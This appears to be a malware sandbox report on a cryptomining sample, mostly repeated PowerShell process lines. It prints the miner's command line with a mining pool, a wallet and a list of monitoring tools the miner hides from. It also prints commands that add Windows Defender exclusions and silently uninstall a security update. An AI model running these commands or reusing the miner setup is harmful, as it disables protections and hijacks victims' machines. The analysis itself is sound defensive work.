          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
          Source: svchost.exe, 0000003C.00000002.3904399498.000001631AECA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000003C.00000003.2341753532.000001631AE6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHQJOFQBYNOSVYBFU
          Source: svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443--USER=42P6ET5FTDLPMN3YHKJXP5FUVVXX9YVFATR8IF1FHGKLCJL94BGQ9XC42D6MPP1SBI2YH9DN9BW6B7396GRTBR9YTBRKTAQ--PASS=1234--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=PNHTLZTMUVJX.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=HQJOFQBYNOSVYBFU
          Source: svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=POOL.HASHVAULT.PRO:443 --USER="42P6ET5FTDLPMN3YHKJXP5FUVVXX9YVFATR8IF1FHGKLCJL94BGQ9XC42D6MPP1SBI2YH9DN9BW6B7396GRTBR9YTBRKTAQ" --PASS="1234" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="PNHTLZTMUVJX.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="HQJOFQBYNOSVYBFU"
          Source: svchost.exe, 0000003C.00000002.3904273552.000001631AEAF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.2341753532.000001631AE6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.3904025620.000001631AE2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7515Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2223Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8472Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeDropped PE file which has not been started: C:\Windows\Temp\pnhtlztmuvjx.sysJump to dropped file
          Source: C:\Users\user\Desktop\prog.exeAPI coverage: 6.8 %
          Source: C:\ProgramData\win32\svhost.exeAPI coverage: 6.8 %
          Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep count: 7515 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1352Thread sleep count: 2223 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep count: 8472 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep count: 1080 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6416Thread sleep count: 31 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6416Thread sleep count: 42 > 30
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: svchost.exe, 0000003C.00000002.3904108781.000001631AE6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
          Source: svchost.exe, 0000003C.00000002.3904025620.000001631AE5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000003C.00000002.3903985542.000001631AE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\prog.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6F1FB118B
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6F1FB11D8
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_00007FF7E32F118B
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_00007FF7E32F11D8
          Source: C:\Windows\System32\conhost.exeCode function: 58_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,58_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\win32\svhost.exeThread register set: target process: 5896Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeThread register set: target process: 4696Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
